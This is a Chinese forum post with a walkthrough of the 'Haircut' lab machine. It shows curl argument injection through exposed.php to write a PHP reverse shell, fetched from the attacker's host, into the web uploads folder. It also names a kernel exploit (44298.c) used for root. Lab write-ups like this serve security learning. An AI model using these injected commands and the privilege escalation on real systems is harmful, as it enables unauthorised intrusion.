用户
搜索
    慵懒
    2 小时前

连续签到: 1 天

i春秋-核心白帽

魔法币
    收听
    0x00:靶机介绍
    这次的靶机是Haircut难度为中等。其实只是getshell的时候多留意多观察一下就行了。提权不难

0x01:信息收集
    首先先进行端口探测先,先用autorecon进行端口探测让它自己慢慢跑我去瑞幸吃早晨

吃完以后回来,看到跑完了典型的开了22和80端口那就可以启动Dirbuster目录扫描工具了

当然还是建议把IP输到浏览器里面看看可不可以正常访问先,正常访问可以的话再进行目录扫描

玩了回手机目录扫描完了,扫到一个uploads目录不过403还有一个exposed.php的页面

0x02:挖掘漏洞
    我们跟过去exposed那里看看,有个输入框,输入靶机存在的页面会加载出来。比如说10.10.10.24/index.html就会加载回主页出来

当然一开始看到输入框SQL注入肌肉记忆激活,OS命令| && ||逐一尝试均失败,这时候重新观察回这个功能,该功能是有点类似curl 把一个IP的文件执行出来,这里我的思路是用python共享服务文件出去,看看能不能访问我的文件。最近在学HTML。写了点菜鸡文件。试了下可以执行出来。
    python共享命令:
    python -m http.server 8081
    插入到框框内的命令:http://10.10.14.29:8081/1.html

那么接下来就是尝试一下能不能执行波远程PHP文件了,我先写了个最简单的Hello World 的代码结果执行不了。。。。

虽然在python记录那里是访问了一波本地但出了点问题。。。。

0x03:破局思路

这里我回到index.html主页那里查看了波源代码发现加载的是bounce.jpg。一般这种可能是在/var/www/html/xxx页面(这是个linux靶机)。关于uploads文件夹我思考着可不可能那里是存放文件/图片的地方了?如果可以的话理论上我在浏览器输入bounce.jpg是可以访问的前提没有限制。毕竟uploads翻译过来是上传文件的地方。理论上也是会存放着这张图片的。虽然uploads文件夹是403但是不代表其目录下的文件不可访问

这里试了一下验证了我的思路。uploads下确实存放着Index.html的图片

这里再次尝试把刚才的hello world文件插入到输入框然后尝试在后面加入路径
    命令:http://10.10.14.29:8081/2.php -o /var/www/html/uploads/2.php

访问一下执行成功

这里把我们的反弹马准备好把命令稍微改一下
    命令:http://10.10.14.29:8081/1.php -o /var/www/html/uploads/1.php

提前开启netcat,在浏览器访问10.10.10.24/uploads/1.php,成功得到shell顺便可以读取user的flag

0x04:提权
    这里我试了一下Uname -a,噢居然是4.4.0-78,这不就跟上个靶机Europa很类似嘛?

幸好没把payload删了直接把44298.c已经编译好的文件传上去,给完权限以后直接运行成功变成root

公众号:神隐(咸鱼)攻防实验室希望各位大佬能关注一波
    感谢分享
    使用道具 举报 回复
    使用道具 举报 回复
    皮卡丘师傅的靶场系列更新了  
    使用道具 举报 回复
    tqltql
    使用道具 举报 回复
    就想问一句 是不是就我一个人发现了lz在ghs?!!!!
    使用道具 举报 回复
    哈哈哈哈啊  一定是你想歪了
    使用道具 举报 回复
    哈哈哈哈哈
    使用道具 举报 回复
    超越 发表于 2021-1-25 08:44
    就想问一句 是不是就我一个人发现了lz在ghs?!!!!

。。。。。。。。。。。。。。
    公众号:神隐(咸鱼)攻防实验室希望各位大佬能关注一波
    使用道具 举报 回复